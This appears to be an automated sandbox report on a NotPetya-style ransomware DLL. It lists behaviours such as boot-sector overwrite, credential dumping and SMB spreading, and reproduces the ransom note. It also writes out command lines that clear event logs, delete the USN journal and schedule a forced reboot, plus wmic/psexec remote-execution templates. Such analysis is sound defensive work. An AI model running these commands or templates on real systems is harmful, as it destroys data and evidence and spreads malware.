Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:309071
Start time:22:05:09
Joe Sandbox Product:Cloud
Start date:12.07.2017
Overall analysis duration:0h 10m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:abc.dll
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection:MAL
Classification:mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 90
  • Number of non-executed functions: 56
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Sleeps bigger than 20 are automatically reduced to 1
  • Sleeps bigger than 20 are automatically reduced to 1
  • Found application associated with file extension: .dll
Warnings:
Show All
  • Connection to analysis system has been lost
  • Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Collider Navigation

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook



Signature Overview

Click to jump to signature section


Operating System Destruction:

barindex
Contains functionality to access PhysicalDrive, possible boot sector overwriteShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8CBF CreateFileA on filename \\.\PhysicalDrive01_2_011E8CBF

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_011E1BA0
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1E51 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptDestroyKey,CryptReleaseContext,LocalFree,1_2_011E1E51
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1424 CryptAcquireContextA,GetLastError,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,1_2_011E1424
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E189A StrStrIW,CreateFileW,GetFileSizeEx,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,1_2_011E189A
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1C7F CryptExportKey,CryptExportKey,LocalAlloc,CryptExportKey,CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,LocalFree,1_2_011E1C7F
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1B4E CryptGenKey,CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,1_2_011E1B4E

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1BA0 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportKey,LocalFree,LocalFree,1_2_011E1BA0
Clears the journal logShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknownProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Clears the windows event logShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Writes a notice file (html or txt) to demand a ransomShow sources
Source: C:\Windows\System32\rundll32.exeFile dropped: C:\README.TXT -> decryption service.we guarantee that you can recover all your files safely and easily.all you need to do is submit the payment and purchase the decryption key.please follow the instructions:1.send $300 worth of bitcoin to following address:1mz7153hmuxxtur2r1t78mgsdzaatnbbwx2.send your bitcoin wallet id and personal installation key to e-mail wowsmith123456@posteo.net.your personal installation key:aqiaaa5maaaapaaa++tyrumu+pfr/pqcpalhiajbcixd9om3nuqcxjh6gytiieggdriojyg0vc3ymlm0vm6dnuflp+ctfnhgemd286p6c9ooj4wewgzdnu+wphrgkgpuu75f2gqvetpqbyvpofidq0lfuixrlh9p/l7j2eox+b37pkl9gajy9ft9r7kxavoqvxni68rj7dmyrfytyy2amm10uvp8astgukmm0atzd7puxmbjenkjo/b3xomooqjxgevmikux9eacs2hhfjqata0pkd+/p8onhb4lllk1zyqudtralmi0s+ci4+yh+f3h0bzzwv0bd/dsk83/sjelc+iprfxtm6kcvqnfpa==
Petya / NotPetya detected (based on Eternalblue SMBv1 Shellcode pattern)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E3CA01_2_011E3CA0

Exploits:

barindex
Contains functionality to create an SMB headerShow sources
Source: C:\Windows\System32\rundll32.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_011E2466
Connects to many different private IPs (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.1.16:445
Source: global trafficTCP traffic: 192.168.1.1:139
Source: global trafficTCP traffic: 192.168.1.0:139
Source: global trafficTCP traffic: 192.168.1.2:80
Source: global trafficTCP traffic: 192.168.1.13:445
Connects to many different private IPs via SMB (likely to spread or exploit)Show sources
Source: global trafficTCP traffic: 192.168.1.16:445
Source: global trafficTCP traffic: 192.168.1.1:139
Source: global trafficTCP traffic: 192.168.1.0:139
Source: global trafficTCP traffic: 192.168.1.2:445
Source: global trafficTCP traffic: 192.168.1.13:445

Networking:

barindex
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E67AF memset,select,recv,htons,recv,1_2_011E67AF
Urls found in memory or binary dataShow sources
Source: rundll32.exeString found in binary or memory: http://192.168.1.2/7

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_011E1038
Source: C:\Windows\System32\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive01_2_011E8CBF
Infects the boot sector of the hard diskShow sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11

Stealing of Sensitive Information:

barindex
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\rundll32.exeDirectory queried: number of queries: 1011
Contains functionality to dump credential hashes (LSA Dump)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_2_00F62143
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F62143 GetProcAddress,GetModuleHandleW,GetProcAddress,RtlInitUnicodeString,GetProcAddress,GetProcAddress,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,5_1_00F62143

Persistence and Installation Behavior:

barindex
Creates license or readme fileShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\README.TXT
Drops PE filesShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\dllhost.dat
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\dllhost.dat
May use bcdedit to modify the Windows boot settingsShow sources
Source: loaddll32.exeBinary or memory string: 03<bcdedit.exe`
Contains functionality to infect the boot sectorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: memset,memset,memset,GetSystemDirectoryA,GetLastError,CreateFileA,DeviceIoControl,GetLastError,_itoa,memcpy,memcpy,CloseHandle, \\.\PhysicalDrive1_2_011E1038
Source: C:\Windows\System32\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,LocalAlloc,DeviceIoControl,WriteFile,LocalFree,CloseHandle, \\.\PhysicalDrive01_2_011E8CBF
Infects the boot sector of the hard diskShow sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: 0
Writes directly to the primary disk partition (DR0)Show sources
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512
Source: C:\Windows\System32\rundll32.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 512

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,1_2_011E9367
Generates new code (likely due to unpacking of malware or shellcode)Show sources
Source: C:\Windows\System32\rundll32.exeCode execution: Found new code
PE file contains an invalid checksumShow sources
Source: F915.tmp.2724.drStatic PE information: real checksum: 0x18550 should be: 0x23f50
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65955 push ecx; ret 5_2_00F65968
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F65955 push ecx; ret 5_1_00F65968
Contains functionality to check for running processes (XOR)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_011E8677

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Enumerates the file systemShow sources
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Shows file infection / information gathering behavior (enumerates multiple directory for files)Show sources
Source: C:\Windows\System32\rundll32.exeDirectory queried: number of queries: 1011
Contains functionality to enumerate network shares of other devicesShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$1_2_011E9987
Contains functionality to spread via wmic.exeShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E98AB GetSystemDirectoryW,PathAppendW,PathFileExistsW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,GetLastError,1_2_011E98AB

System Summary:

barindex
Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
Source: abc.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbolsShow sources
Source: Binary string: wdigest.pdb source: F915.tmp
Source: Binary string: wdigest.pdbJ6 source: F915.tmp
Binary contains paths to development resourcesShow sources
Source: rundll32.exe, abc.dllBinary or memory string: MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQABC:\Windows;.3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.%ws.*...Microsoft Enhanced RSA and AES Cryptographic ProviderREADME.TXTQ
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.expl.rans.spyw.winDLL@21/7@0/5
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E81BA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,SetLastError,1_2_011E81BA
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8677 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_011E8677
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E85D0 LoadResource,LockResource,SizeofResource,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_011E85D0
Creates temporary filesShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
PE file has an executable .text section and no other executable sectionShow sources
Source: abc.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Runs a DLL by calling functionsShow sources
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\abc.dll'
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknownProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: unknownProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: unknownProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: unknownProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\abc.dll,#1
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420}
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Setup
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl System
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Security
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil cl Application
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fsutil.exe fsutil usn deletejournal /D C:
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\schtasks.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: abc.dllStatic PE information: Section: .rsrc ZLIB complexity 0.999495577221
Contains functionality to call native functionsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree,5_2_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,5_2_00F61D5F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F618D9 NtQuerySystemInformation,GetModuleHandleW,GetProcAddress,NtQuerySystemInformation,LocalFree,5_1_00F618D9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F61D5F GetCurrentProcess,NtQueryInformationProcess,RtlGetCurrentPeb,5_1_00F61D5F
Contains functionality to communicate with device driversShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E8D5A: CreateFileA,DeviceIoControl,LocalAlloc,SetFilePointer,WriteFile,LocalFree,CloseHandle,1_2_011E8D5A
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9987 wsprintfW,wsprintfW,wsprintfW,WNetAddConnection2W,wsprintfW,PathFindExtensionW,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError,1_2_011E9987
Contains functionality to shutdown / reboot the systemShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Creates files inside the system directoryShow sources
Source: C:\Windows\System32\rundll32.exeFile created: C:\Windows\abc
Enables security privilegesShow sources
Source: C:\Windows\System32\wevtutil.exeProcess token adjusted: Security
PE file contains executable resources (Code or Archives)Show sources
Source: dllhost.dat.2724.drStatic PE information: Resource name: BINRES type: ump; PE32 executable for MS Windows (console) Intel 80386 32-bit
PE file has an invalid certificateShow sources
Source: abc.dllStatic PE information: invalid certificate
Reads the hosts fileShow sources
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
Contains functionality to create processes via WMIShow sources
Source: rundll32.exeBinary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%ws
